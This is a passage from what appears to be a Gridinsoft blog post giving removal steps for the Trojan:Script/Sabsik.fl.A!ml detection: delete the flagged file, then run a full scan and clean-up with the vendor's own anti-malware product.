However, it is impossible to be 100% sure that the source of the downloads is safe. If after interacting with a shadow file of unknown origin you see a warning about the Sabsik Trojan program, you should quarantine/remove the source of the threat.

How to remove Trojan:Script/Sabsik.fl.A!ml?

If Sabsik Trojan was detected in an untrusted file, you should delete it. However, this is not enough to be sure of your security. We recommend performing a full system scan with a reliable anti-malware tool such as GridinSoft Anti-Malware. Last but not least, you may want to consider changing important passwords in case they are compromised, although this is unlikely to happen.

Download and install GridinSoft Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

GridinSoft Anti-Malware main screen

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click “Advanced mode” and see the options in the drop-down menus. You can also see extended information about each detection – malware type, effects and potential source of infection.

Scan results screen

Click “Clean Now” to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post Trojan:Script/Sabsik.fl.A!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojanscript-sabsik-fl-aml-analysis-removal/feed/ 0 20180